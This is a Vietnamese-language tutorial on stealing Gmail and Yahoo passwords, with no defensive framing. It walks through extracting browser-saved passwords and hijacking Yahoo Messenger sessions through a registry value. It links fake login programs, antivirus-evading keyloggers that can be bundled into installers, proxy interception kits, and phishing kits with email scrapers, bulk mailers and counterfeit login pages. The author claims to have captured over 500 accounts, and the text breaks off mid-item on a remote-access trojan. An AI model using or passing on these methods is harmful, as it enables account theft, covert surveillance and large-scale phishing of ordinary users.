Kỹ Thuật hack Password Gmail và Yahoo

I - Exploit password được lưu lại trên các trình duyệt Hacker thường lợi dụng thói quen của người dùng thường lưu lại password các tài khoản trên trình duyệt để lần sau đăng nhập dễ hơn. Khi có quyền điều máy tính của victim, password có thể bị lấy như sau: Đối với firefox password được lưu lại theo đường dẫn:
Nội dung trích xuất từ tài liệu:
Kỹ Thuật hack Password Gmail và Yahoo Kỹ Thuật hack Password Gmail và Yahoo I - Exploit password được lưu lại trên các trình duy ệt Hacker thư ờng lợi dụng thói quen của người dùng thường lưu lại password các tài khoản trên trình duyệt để lần sau đăng nhập dễ hơn. Khi có quyền điều máy tính của victim, password có thể bị lấy như sau: - Đối với firefox password đư ợc lưu lại theo đường dẫn: tool -> options ->security -> save password s -> show password - Đối với IE hoặc chrome (cả firefox nữa) ta có thể dùng tool sau: http://www.mediafire.com/?mj1mm8gx07m1db0 (pass dải nén: ducdung.08clc) II - Password yahoo messenger được lưu lại: Bạn vào run: regedit Sau đó vào theo đư ờng dẫn: HKEY_CURRENT_USER -> software -> yahoo ->paper Click vào “paper”, bạn nhìn sang khung bên trái , ở cột name, bạn chú ý 2 mục có tên: “ETS” và “Yahoo! User ID”. Ta sang bên c ột data() + ETS : chính là password ở dạng mã hóa + Yahoo! User ID: Chính là nickname yahoo Vậy ta có thể làm được gì: Hình thức mã hóa với phiên bản beta 11 tôi chưa giải mã được. Nhưng nếu coppy đoạn mã hóa password (ETS) từ máy của victim rồi thay vào máy của mình và thay cả nickname yahoo của victim vào “ Yahoo! User ID”, thì lúc khởi động, nickname của victim s ẽ đăng nhập tự đông trên máy của mình. III - Sử Dụng Ph ần Mền Face Login: Hacker s ẽ s ử dụng phần mền tạo ra một giao diện đăng nhập y hệt như “Yahoo Messenge”, rồi bằng cách nào đó đưa vào máy tính của victim. Khi victim đăng nhập vào nick chat, thì toàn bộ ID và pass s ẽ được g ửi về mail của hacker đã được thiết lập từ trước. Link download: http://www.mediafire.com/?460dma29svhpd93 Tut hướng dẫn s ử dụng: www.mediafire.com/?n7fc1o2nko9ardr IV- Sử dụng ph ần mền gián điệp keylogger: Đó là hình thức ghi lại mọi hoạt động trên bàn phím của victim sau đó g ửi về mail của hacker Trong quá trình s ử dụng, tôi thích nhất là perfect keylogger Chức năng: Ghi l ại mọi thao tác bàn phím,những website đã vào, chụp ảnh màn hình destop rồi gửi về mail của hacker Cách s ử dụng: Bạn có thể s earch trên google. Riêng có 1 điểm cần lưu ý, đó là khi thiết lập địa chỉ mail g ửi về bạn nên chọn mail aol Ví dụ cấu hình mail: s end to: ducdung123@aol.com Smtp: smtp.aol.com Username: ducdung123 Password: *********** Key perfect logger có 2 phiên bản 1.68 và 1.75. Điểm khác nhau: + 1.68: có khả năng tạo tao ra virus (Chính là con keylogger mà hacker đã thi ết lập) và đính kèm vào phần mền. Khi người dùng cài phần mền đó thì keylogger cũng vô tình cũng cài trên máy đó luôn. Link download full: http://www.mediafire.com/?kg9t69t02b72gbx (pass: ducdung.08clc) + 1.75: Mạnh hơn 1.68 có thể qua mặt nhiều phần mền antivirus khi nó đã được cài đặt trên máy tính victim. Nhưng không có khả năng tạo virus đính kèm vào phần mền như 1.68 Link download full: http://www.mediafire.com/?86h81b4961w4ib4 ( pass:ducdung.08clc) Vi deo hướng dẫn s ử dụng: Link download: http://www.mediafire.com/?sswzmqhapmfxfh4 V - Giải mã ký t ự password b ị ẩn dưới dạng : ******* Vô tình bạn thấy password gmail hay yahoo của victim ở dạng ***** nó đã bị ẩn đi và bạn muốn đọc các ký tự đó: Link down load: http://www.mediafire.com/?0qxzsk30k0izi0f (pass dải nén: ducdung.08clc) Tool này có thể s ử dụng đối với tất cả các loại password với mọi phiên bản. VI- Sử dụng kỹ thuật giả mạo certificate: Đây là một kỹ thuật rất hay , s ử dụng hướng luồng thông tin đi qua c ổng proxy đã được thiết lâp trên máy của hacker. Chính vì vậy hacker s ẽ có toàn bộ thông tin của victim được g ửi trên internet bao g ồm cả những thông tin nhạy cảm. Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết Link download toàn bộ tool và tài li ệu hướng dẫn: http://www.mediafire.com/?zhw99ufbem6geaq (Password gi ải nén: ducdung.08clc) Bao g ồm: +) burp suite v1.3 +) Quick_Batch_File_Compiler_3.21 +) Java bổ trợ +) Đoạn mã thiết lập proxy tự động trên giao diện IE +)Tài liệu hướng dẫn chi tiết được viết bởi anh tocbatdat VII - Sử dụng kỹ thuật giả danh google ho ặc yahoo: Bộ tool đầy đủ : +) Tool thu thập địa chỉ mail trên các website, diễn đàn rồi export ra dạng file text.( bao g ồm cả key bản quyền.) Link download: http://www.mediafire.com/?2e9w6b2sourzrvz +)Tool g ửi mail hàng loạt. tầm 10.000 mail/ 1 buổi sáng (qua mail của server host webs) Link download: http://www.mediafire.com/?72dv1x5307rf5i0 http://www.mediafire.com/?a54f76648no4xoa Nếu g ửi bằng gmail thì sau vài l ần s ẽ bị ISP chặn lại với lý do spam. +) Site face login gmail và yahoo: Đây là website giả mạo (giao diện giống s ite đăng nhập của gmail và yahoo), khi victim đăng nhập vào thông tin mail và pass trên site đó s ẽ được g ửi về địa chỉ hosting của hacker. Link download: + Gmail: http://www.mediafire.com/?qm29b24bnga1444 + Yahoo: http://www.mediafire.com/?g42d731e5igvp9l  Tóm lại, hacker s ẽ dùng những tool trên và gi ả danh goolge hay yahoo rồi g ửi mail cho victim yêu cầu click vào đư ờng link đăng nhập để kiểm tra tính xác thực của tài khoản, mục đích là để loại bỏ những tài khoản ảo không có ngư ời dùng và nếu vicim không xác nhận, tài khoản đó s ẽ bị khóa vĩnh viễn. +Video hướng dẫn s ử dụng face login page: Link download: http://www.mediafire.com/?o8mihcdp4lkathr Với cách này trong đợt thử nghiệm lần trước, tôi đã thu thập thông tin ID và pas s hơn 500 gmail người dùng. Một số tut tham kh ảo: 1. Đột nhập máy tinh qua teaview rat: - Teamview rat được các phát triển dựa phần mền điều khiển máy tính ngư ời khác: teamview. Nó đư ợc tạo ra dư ới dạng file .exe, khi victeam click vào thì phần mền teamview đư ợc cài đặt ở chế độ ẩn trên máy của victeam và g ửi ID,pass về cho hacker. - ...